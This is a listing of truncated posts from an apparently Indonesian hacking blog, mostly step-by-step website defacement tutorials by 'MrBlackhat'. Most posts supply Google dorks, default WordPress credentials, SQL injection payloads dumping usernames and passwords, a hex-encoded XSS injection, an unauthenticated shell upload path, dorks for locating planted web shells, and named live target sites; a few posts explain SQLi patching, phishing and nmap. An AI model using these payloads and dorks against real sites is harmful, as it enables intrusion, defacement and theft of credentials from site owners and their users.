Postingan

Menampilkan postingan dari 2020

Cara Deface poc Wp u/p default 2020?!

Gambar
 Assalamu'alaikum wr wb jumpa lagi dengan syaa MrBlackhat kali ini gua akan kasih tutorial sesuai dengan judul oke langsung tanpa basabasi kita mulai:v Bahan: you know lah bang jago:v Dork: -intitle:"My Blog - My wordpress Blog" site:terserah lu cok:v Pertama kalian dorking dulu cokkk:v oke Jika kalian dah nemu target masukan exploit nya di bawah ini Exploit:wp-login.php Contoh:site.com/wp-login U/p: admin/pass U/p:admin/admin Jika vuln maka masuk ke dashboard nya seperti di bawah ini Trus kalian mencet plugins trus cari File Manager kalau ada tulisan install berarti di install dulu tod oke kalau sudah kalian mencet kayak gambar di atas oke Terserah kalian mau apain tuh website kalau kalian ingin tebas bisa caranya gimana bang? Hapus tuh file index.php ganti SC hacked kalian oke cara manggil nya gmn bang?  Hapus di belakang domainnya contoh Site.com/wp-admin/plugins bla bla  Menjadi site.com Nanti hasilnya kayak gini Sekian dari syaa wassalamu'alaikum wr wb jika kalia...

Deface poc url Pesoining+live target | KBCI INDONESIA

Gambar
 Onechan baka>\\< :> Assalamu'alaikum wr wb jumpa lagi dengan saya MrBlackhat seperti di judulnya di sini saya akan deface poc bug url Pesoining Ok langsung saja cekidot:V Disini kalian gak usah pake script depes kalian cuman nick kalian sama jangan lupa pcr:v biar ada semangatin uwu> < Untuk dorknya  Pencet onichan   Untuk live target https://letterk.com.ua Tinggal kalian tambahkan ?s=Hacked+By+nick kalian tod Jikah sudah nanti akan muncul nick kalian Jika masih belum paham bisa nonton chanel kami dan jangan lupa Subscribe dan like Makasih Sekian dari saya tutorialnya wassalamu'alaikum wr wb sampai jumpa lagi onichan:v

Tutorial SQL To Xss

Gambar
 Assalamu'alaikum wr wb kali ini saya akan kasih tutorial cara SQL to Xss oke langsung saja ke tutorialnya lanjut:v Bahan: - Hp/PC - internet jelas:v - kopi:v - Target - pacar biar ada semangatin:v Pertama kalian harus punya target terlebih dahulu disini saya sudah ada target http://sahyogtraders.in/ Oke jika sudah dapat target kalian inject dulu seperti sampai muncul angka togel nya jika sudah kalian Hex Dulu payload Xss nya  Pencet di sini kimak:v Jika sudah di Hex payload Xss tinggal kalian salin angkanya seperti ini  3C7363726970743E616C6572743D70726F6D707428646F63756D656E742E646F6D61696E293C2F7363726970743E Oke kalian salin hex Xss nya ke angka togel kalian contoh:.php?=-27%27+union+select+1,0x3C7363726970743E616C6572743D70726F6D707428646F63756D656E742E646F6D61696E293C2F7363726970743E,3,4,5--+- jangan lupa tambahin 0x Oke dan hasilnya seperti di bawah ini Jika masih belum paham? Bisa lihat video di bawah ini dan jangan lupa subscribe dan like jik...

Cara deface poc ojs (open journal system)

Gambar
Assalamualaikum wr wb jumpa lagi dengan saya MrBlackhat kali ini saya akan kasih tutorial cara deface poc ojs Oke tanpa basa basi langsung saja Bahan: - dork - internet - HP/laptop - scrip/shell kalian - pacar biar ada semangati:v Dork: -intext:Journal "new submission"            -inurl:/index.php/index/user/register            -intext:about submission "Journal"            -inurl:/index.php/ojs Kembangin lagi sesuai otak kalean xixixi Untuk mengecek web nya vuln atau gak kalian bisa ketik /files di depan contoh: https://kbcii.blogspot.com/files  jika nanti muncul index of berarti vuln. Yang pertama kalian dorking terlebih dahulu di google kesayangan anda Jika sudah kalian Register terlebih dahulu gan isi terserah yang ada tanda * dan isi phone jika sudah kalian centang yang ada tulisan  Author : Able to submit items to the journal Jika sudah kalian sudah registras...

Cara Deface poc SQL LOKOMEDIA

Gambar
Assalamualaikum jumpa lagi dengan saya MrBlachat kali ini aku akan kasih saya kasih tutorial cara deface SQL LOKOMEDIA Oke langsung saja Bahan - hp/pc - dork - internet pastinya - MD 5Decrypter - pacar biar ada yang semangatin - kopi biar otak fresss Dork:-  inurl:statis-1-pengantar.html             - i nurl:statis-1/profil.html             - inurl:statis-19-beasiswa.html             - inurl:statis-22-kerjasama.html Kembangin lagi gan sesuai otak kalian Exploit: 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Ok langsung saja ke tutorial nya Pertama kalian dorking di google kesayangan anda kayak seperti di bawah ini Jika kalian dah punya target tinggal kalian masukkan exploit nya di atas Contoh: http://nama domain.go.id/statis- 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511...

Cara deface poc wp-ghost themes

Gambar
Assalamualaikum wr.wb jumpa lagi dengan saya MrBlachat kali ini aku akan kasih tutorial cara deface poc Wp-ghost themes+live target Oke langsung saja Bahan: - Dork - scrip html/shell.php kalian - csrf online - pacar biar ada semangatin:v - kopi biar gak terlalu tegang Dork:- inurl:wp-content/themes/Ghost/ Exploit:wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php Ok langsung saja ke tutorial nya Pertama kalian masukkan dork di atas ke Google kesayangan anda jika sudah masukan exploit nya contoh: https://nama domain.com/ wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php Jika vuln nanti kayak di gambar di bawah Jika vuln di atas kalian masukan link target kalian ke csrf online dan ingat harus Filedata Jika sudah untuk cara manggil target Contoh: https://Nama target kalian.com/ wp-content/uploads/settingimages/nama shell kalian atau script deface kalian. Nah tinggal mirror deh>_< xixixixi Oke sekian dari tutorial da...

Cara deface dorking shell tebas index

Gambar
Assalamu'alaikum wr wb Jumpa lagi dengan saya MrBlackhat kali ini saya akan kasih tutorial cara dorking shell tanpa basa basi kita langsung saja ke tutorialnya cekidot Bahan: - HP/laptop - shell/script deface kalian - pacar biar ada semangatin Dork:  intitle:index of wso.php intext:64k intitle:index of lux.php intext:64k intitle:index of mego.php Intex:64k intitle:index of raw.php intext:64k intitle:index of H3IIO.php intext:64k intitle:index of H3IIX.php intext:48k intitle:index of shell.php intext:64k intitle:index of cgi.php intext:64k intitle:index of DrugO.php intext:64k intitle:index of xleet.php intext:48k [New Dork] intitle:index of / cgp.php intitle:index of / pgp.php intitle:index of / shell23.php intitle:index of / semo.php intitle:index of / shell9.php intitle:index of / Cih.php intitle:index of / cp2019.php intitle:index of / ml.php intitle:index of / dr.php intitle:index of / df.php intitle:index of / mst.php intitle:index of / full.ph...

Cara deface priv8 src

Gambar
Assalamu'alaikum wr wb Jumpa lagi dengan saya MrBlackhat di blog KBCI INDONESIA mohon maaf jika mimin jarang upload karna malas: v hehehe kali ini saya akan bagi tutorial cara deface metode priv8 SRC metode ini sdh lama. Oke tanpa basa basi langsung saja kita ketutorialnya. Bahan: - HP/PC - dork - pacar biar ada semangatin - kopi biar fokus Dork: - inurl:config/config.izo            - intitle: "Priv8 SRC"            - "priv8 SRC config.izo" Oke langsung ajah Pertama² kalian masukan dork di atas Pilih web yang kalian mau jadiin pcr oke gan: v Jika sudah kalian pilih web yang kalian mau nanti kayak gini Trus kalian isi terserah mau heked by kek apa kek terserah kalian gan. Bang gmn cara manggil nya kalian ganti config.izo dengan tar.tmp http://www.sitelu.gov/config/tar.tmp Dan Boom!!! Oke sekian dari tutorial dari saya jika ada ingin di tanyakan bisa tulis di kolom komentar gan oke mohon maaf jika ...

Cara Menutup Bug SQL injection

Gambar
Assalamu'alaikum selamat datang di KBCII OFFICIAL,  Mohon maaf jika kalau aku jarang upload karena Adminnya lagi sibuk mendalami SQL INJECTION oke kesempatan kali ini gua akan kasih nih cara menutup Bug SQL INJECTION.  Cara Patch Bug SQLi - SQL Injection (SQLi)  adalah jenis serangan dimana perintah SQL disuntikkan ke input data atau semacamnya untuk memengaruhi perintah SQL yang telah ditetapkan. Serangan ini digunakan atacker untuk mendapatkan akses langsung ke database. Dan dengan demikian sang attacker bisa membaca data sensitif, hingga memodifikasi database (masukkan, perbarui, hapus). Celah Sqli ini bisa dibilang celah aplikasi web tertua, paling umum, tapi sangat berbahaya. Patch SQL Injection Sebagian besar aplikasi dan situs web modern menggunakan bentuk konten yang dinamis. Konten tersebut bisa dalam bentuk artikel, buku tamu, gallery, detail produk, halaman login, dll. Dengan demikian dalam scriptingnya pasti melibatkan database sebagai penyimpan data konten di...

Script jso creator

Gambar
 <script type="text/javascript" src="masukan link pastebin kalian"></script> JSO CERATOR KBCII OFF JSO Creator © 2020 Babacang07 KBCII OFFICIAL

Cara belajar SQL Chall

Gambar
Assalamualaikum wr wb jumpa lagi dengan saya MrBlackhat oke kali ini kita akan kasih tutorial Cara sql chall  Ok kita langsung saja cikidot Dork:-index.php?Id= site:go.id           -news.php?id= Dios: concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)) <center><img src="https://d.top4top.io/p_16098ygtz0.png" height="400px" width="400px"><br>terinjeck nama kalian <br> Oke langsung saja tutorialnya Pertama kalian dork dulu dan cari targetnya. Disini saya sudah punya target nya contoh: http://kansascitynova.org/news.php?id=42 Jika kalian sudah punya target kalian bisa tambahin (') di belakang angka PHP?id=42 jika ada tulisan Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for t...

Pengertian pishing Dan cara menghindarinya

Gambar
Assalamualaikum wr wb jumpa lagi dengan saya Ridwan Gans kali kita gak akan tutorial tapi kita jelaskan apa itu pishing oke lanjut saja simak dan pahami semoga bermanfaat😇 Apa itu web pishing? Bagi masyarakat awam istilah web phising mungkin belum terlalu familiar. Maka dari itu, alangkah baiknya jika kita mengenal lebih dulu seputar apa itu web phising mulai dari awal. Menurut laman Wikipedia, web phising ( pengelabuhan ) adalah situs web yang dirancang untuk melakukan bentuk penipuan dengan cara percobaan untuk mendapatkan informasi sensitif, seperti nomor kartu kredit, kata sandi, atau data-data  credentials lainnya. Web phising biasanya berbentuk menyerupai website asli baik dari segi tampilan maupun nama domain dengan tujuan untuk meminimalisir kecurigaan calon korban. Dari definisi tersebut, secara umum kita bisa menarik kesimpulan bahwa web phising sejatinya merupakan sebuah website biasa yang memang sengaja dibuat untuk melakukan tindak kejahatan. Tujuan utama pembuat web ...

Tutorial deface poc dns hijacking

Gambar
Assalamualaikum wr wb Jumpa lagi dengan say Mrblackhat oke kali ini kita akan tutorial deface dns hijacking oke langsung saja Bahan: 1. Kalian haru mempunyai akun awardspace 2. SC depes harus bentuk index.php 3. Jomblo+tampan Oky Yang belum punya akun awardspace kalian bisa daftar di link bawah ini https://www.awardspace.com/free-hosting/ Cara daftar akun awardspace. 1. Isi sesuai kemauan anda dan pake email anda jika sudah kalian pencet register now,Lanjut yang kedua. 2. Jika muncul kayak gitu kalian pencet close. 3. Jika kalian sudah close semua maka nanti kayak gambar di atas ok. 4. Kalian cari hosting Tools  dan kalian enter. 5. Jika sudah Kalian pencet Domain Manager. 6. Jika muncul gambar di atas kalain cari tulisan Create a free subdomain. 7. Jika sudah kalian isi domain sesuai kemauan anda trus pencet di samping kanan kalian pilih terserah dan create jika sudah nanti ada tanda warna hijau di atas. 8. Kalian pencet lagi Hosting ...

Pengertian nmap sama cara kerjanya

Gambar
Assalamualaikum guys jumpa lagi di mr ridwan Oke kali ini kita akan menjelaskan apa itu nmap dan cara kerjanya oke langsung saja Pengertian nmap NMAP adalah singkatan dari  Network Mapper  yang merupakan sebuah  tool atau alat yang bersifat  open source . Alat ini hanya digunakan secara khusus untuk eksplorasi jaringan serta melakukan audit terhadap keamanan dari jaringan. Seseorang yang berjasa mengukirkan namanya sebagai penemu atau pencipta dari NMAP adalah Gordon Lyon. Ia berhasil membuat alat ini pada tanggal 1 September 1997 yang kemudian ia publikasikan melalui sebuah website yang memang menyediakan beragam artikel yang berkaitan dengan keamanan komputer. Fungsi NMAP Lalu apakah Anda tahu apa fungsi NMAP? Di bawah ini kami akan menjelaskan kepada Anda semuanya tentang beberapa fungsi yang dimiliki oleh NMAP. 1. Digunakan untuk memeriksa jaringan Fungsi NMAP yang pertama adalah sebagai alat untuk melakukan pengecekan pada jaringan. NMAP bisa d...